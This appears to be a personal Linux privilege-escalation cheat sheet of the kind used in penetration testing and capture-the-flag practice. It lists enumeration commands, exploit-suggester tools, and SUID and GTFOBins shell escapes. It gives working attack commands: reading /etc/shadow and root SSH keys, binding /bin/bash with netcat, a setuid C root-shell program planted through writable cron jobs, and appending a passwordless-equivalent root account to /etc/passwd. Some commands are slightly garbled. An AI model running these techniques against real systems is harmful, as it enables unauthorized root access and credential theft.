1. Manual enumeration

id
pwd
uname -a // are there kernel exploits?
cat /etc/hosts
cat /etc/passwd
ls -lah /etc/passwd
cat /etc/group
cat /etc/fstab
cat /etc/crontab
df
cd /home && ls ... // or execute ls -lahR /home/
cd /root && ls ...
netstat -antup
ps aux
sudo -l
su // if passwords are already known
tmux ls
screen -list
cat /proc/self/... <- many interesting things.
ls /proc/self/root <- alternative path to the root dir!
uname -a // => Check for Kernel exploits
find / -type f -user $currentUser 2> /dev/null

// Check which packages are installed, here for Debian/Ubuntu
apt list --installed | grep -v automati

// Enumerate applications, /var/www/...

// Go through all log files....
// => Check syslog for CRON executions.

=> See this list of inter­est­ing Lin­ux files.

Here as well

2. Script enumeration

Upload the _ex.tar file and begin to exe­cute the enu­mer­a­tion scripts.

3. Extended enumeration

Go to these links.

• Lin­ux
  • https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
  • https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets
• Win­dows
  • http://www.fuzzysecurity.com/tutorials/16.html

Various notes

Techniques

Helper scripts

• https://github.com/mzet-/linux-exploit-suggester
• https://github.com/jondonas/linux-exploit-suggester‑2
• Lin­ux Smart Enumeration
• https://github.com/rebootuser/LinEnum
• https://github.com/TH3xACE/SUDO_KILLER
• linuxprivchecker.py
  • Muss ggf. in Python 3‑Skript kon­vertiert werden.
  • Muss evtl. angepasst wer­den in Zeile 53: results = str(out, ‘utf‑8’).split(“\n”)
• https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

Monitoring scripts

• https://github.com/DominicBreuker/pspy
  • Mon­i­tor­ing a sys­tem. Can be open in a ter­mi­nal to see if oth­er users/processes do stuff.
  • If a user per­forms sudo some­where -> sudo_inject

Running root services

• Check if vuner­a­bil­i­ties are known for a run­ning process to fork a shell. 
  • ps aux
  • net­stat ‑antup
  • lsof ‑i
• Known soft­ware:
  • MySQL: Could sup­port shell com­mand (sys­tem whoa­mi with­in mysql)

Exploit SUID files

• Find them

  • find / -type f -user root -perm /u+s -ls 2>/dev/null
    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \;
    find . -perm -o+r // find all world wide readable files.

• Check if vul­ner­a­bil­i­ties are known or if they have a fea­ture to spawn a shell.
• Nmap:

  • nmap --interactive
    !sh

• Net­cat / nc:

  • nc -e /bin/bash 127.0.0.1 4444

• awk / gawk:

  • awk '{ print }' /etc/shadow
    awk 'BEGIN {system("id")}'

• find:

  • find /home -exec nc -lvp 4444 -e /bin/bash \;
    find /home -exec /bin/bash \;

• strace:

  • Write and compile a a SUID SUID binary c++ program
    strace chown root:root suid
    strace chmod u+s suid
    ./suid

• npm:

  • ln -s /etc/shadow package.json && sudo /usr/bin/npm i *

=> Check https://gtfobins.github.io/ for a huge list with oth­er binaries!

Cau­tion:

• Some bina­ries using less or oth­er soft­ware for dis­play­ing con­tent. If the ter­mi­nal is height enough, then they exit direct­ly. Try to make the ter­mi­nal very nar­row so that the pro­gram has to to split the con­tent to mul­ti­ple “pages”. Then, e.g. use !/bin/bash in the case of less.

Exploit cronjobs

• Check if /etc/crontab and /etc/cron.* files are write­able directly.
• Check if files which are called / sym­linked in the cron direc­to­ries are writeable 
  • Check for world-write­able files with find / ‑perm ‑2 ‑type f 2>/dev/null
• Exam­ple with C code: 
  • If you can write some root crone file, you can e.g. cre­ate a c file like this:

  • #include <stdio.h>
    #include <sys/types.h>
    #include <unistd.h>
    
    int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    }

  • Com­pile it here or whereev­er: gcc root.sh; chmod u+s a.out
  • Add the pro­gram to a write­able cron job like

  • echo “chown root:root /tmp/rootme; chmod u+s /tmp/rootme;”>/.../cron-logrotate.sh

  • Wait until the script has run and $prof­it.

Various

• Check groups
  • To find all files who belong­ing to a group: 

    • find / -group internal 2> /dev/null

  • If the user is in the disk group, try this: 

    • debugfs /dev/sda debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow

• Check sudo­ers
• Check all files in home directories
• Find files to write: 

  • find . -writeable

  • find / -type f -writable -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type d 2>/dev/null

• Find direc­to­ries to write: 

  • find / -regextype posix-extended -regex "/(sys|srv|proc|usr|lib|var)" -prune -o -type d -writable 2>/dev/null

• Pass­word checking: 
  • Check for files con­tain­ing PASSWORD 

    • grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

  • Scan the mem­o­ry for PASSWORD 

    • strings /dev/mem -n10 | grep -i PASS

  • Check files with PASSWORD 

    • locate password

• Deter­mine sys­tem timers to see what is exe­cute auto­mat­i­cal­ly the next time: 

  • systemctl list-timers --all

• If a user on the sys­tem per­formed sudo a short time ago, use https://github.com/nongiach/sudo_inject
• Can we read emails in /var/mail/?
• Check files between a time window: 

  • find / -newermt 2020-01-02 ! -newermt 2020-02-01 2> /dev/null

• Is /etc/passwd writeable? 
  • If yes, change a pass­words user or add a new root user (pass­word can be set with openssl pass­wd evil)

  • echo "root2:AK24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwd

• Do mem­o­ry inves­ti­ga­tion. Dump mem­o­ry from inter­est­ing process­es and grep/strings them.

Collections

• http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/